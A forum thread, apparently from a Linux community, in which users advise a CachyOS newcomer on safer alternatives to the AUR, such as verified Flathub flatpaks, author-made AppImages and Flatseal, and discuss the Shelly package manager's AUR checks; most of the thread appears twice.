I’m still quite new to Linux, using CachyOS (arch). What’s the best alternative to AUR, I saw someone mention Flatpak because it is at least somewhat sandboxed. Anyone have some best practices given AUR doesn’t seem to good of a choice?
The AUR should not be thought of as a package manager repo. It should be thought of as a pastebin for pkgbuild scripts, i.e. build instructions. Running them without looking is the equivalent of blindly copying shell commands from stackoverflow.
If you are thinking “I want to install this package I found, it doesn’t exist in any repo, but their build instructions are complex and don’t have instructions for arch,” a pkgbuild is a great resource. At the very least you can read someone’s pkgbuild to see what dependencies and build steps worked for them (in the same way that you can disect a shell script line-by-line to understand what it’s doing).
The only official way to use the AUR is to manually download a pkgbuild file and use manually run makepkg to execute it. All the other tools that turn it into a convenient repo source (ex. yay, paru, pamac) are unofficial.
Stick with verified flatpaks on flathub (they also host unverified packages, avoid those), and Appimages directly from the software maker’s site, if they offer them.
The Gnome Software Store and the Mint software store both have the option to not show unverified flatpaks, which I would suggest using.
I use some Flatpaks. Flatpaks sometimes create problems with paths and permissions and stuff. They are generally useful, as are appimages when created by the author(s), but are not a panacea. Also, there are flatpaks not created by the official source.
Reading the reply above I realized half my post is redundant :)
Regarding permissions, I highly recommend the use of Flatseal, which is a very polished GUI program that lets you adjust the permissions of any flatpak individually, quite similar to how Android does it.
Cachy’s new package manager, Shelly, which is awesome, BTW (writing about arch or derivatives without using BTW is against the law, remember.) does checks on AUR packages when installing or updating. Zoey rocks!
Could you explain how Shelly does checks on AUR packages? I can’t find where it mentions doing so on its website, and even in its documentation is says:
Enable AUR - Allows access to the AUR download features, these packages are managed by individual users so access at your own risk
How does Shelly make using the AUR safe for people who do are not able to effectively investigate the install scripts themselves?
Seems like it’s certainly better than nothing, but I’m unsure if the 1500 infected packages in the AUR would’ve been flagged by this, depending on how the malware was introduced. Even with Shelly, I probably wouldn’t recommend most people use the AUR until more protections are put in place by the Arch team.
To be honest. Downloading Flatpaks from Flathub is the way to go.
And don’t believe the stories that take too much disk space. Libraries that Flatpaks depend on are only downloaded once and are shared with all the Flatpaks.
I’m still quite new to Linux, using CachyOS (arch). What’s the best alternative to AUR, I saw someone mention Flatpak because it is at least somewhat sandboxed. Anyone have some best practices given AUR doesn’t seem to good of a choice?
The AUR should not be thought of as a package manager repo. It should be thought of as a pastebin for pkgbuild scripts, i.e. build instructions. Running them without looking is the equivalent of blindly copying shell commands from stackoverflow.
If you are thinking “I want to install this package I found, it doesn’t exist in any repo, but their build instructions are complex and don’t have instructions for arch,” a pkgbuild is a great resource. At the very least you can read someone’s pkgbuild to see what dependencies and build steps worked for them (in the same way that you can disect a shell script line-by-line to understand what it’s doing).
The only official way to use the AUR is to manually download a pkgbuild file and use manually run makepkg to execute it. All the other tools that turn it into a convenient repo source (ex. yay, paru, pamac) are unofficial.
Stick with verified flatpaks on flathub (they also host unverified packages, avoid those), and Appimages directly from the software maker’s site, if they offer them.
The Gnome Software Store and the Mint software store both have the option to not show unverified flatpaks, which I would suggest using.
I use some Flatpaks. Flatpaks sometimes create problems with paths and permissions and stuff. They are generally useful, as are appimages when created by the author(s), but are not a panacea. Also, there are flatpaks not created by the official source.
Reading the reply above I realized half my post is redundant :)
Regarding permissions, I highly recommend the use of Flatseal, which is a very polished GUI program that lets you adjust the permissions of any flatpak individually, quite similar to how Android does it.
Cachy’s new package manager, Shelly, which is awesome, BTW (writing about arch or derivatives without using BTW is against the law, remember.) does checks on AUR packages when installing or updating. Zoey rocks!
Could you explain how Shelly does checks on AUR packages? I can’t find where it mentions doing so on its website, and even in its documentation is says:
How does Shelly make using the AUR safe for people who do are not able to effectively investigate the install scripts themselves?
I don’t know how it’s done, but here is a screencap of an update today:
Thanks for that! I was able to find a page that details what it checks for:
https://www.seafoam-labs.org/shelly-alpm/docs/security/
Seems like it’s certainly better than nothing, but I’m unsure if the 1500 infected packages in the AUR would’ve been flagged by this, depending on how the malware was introduced. Even with Shelly, I probably wouldn’t recommend most people use the AUR until more protections are put in place by the Arch team.
To be honest. Downloading Flatpaks from Flathub is the way to go.
And don’t believe the stories that take too much disk space. Libraries that Flatpaks depend on are only downloaded once and are shared with all the Flatpaks.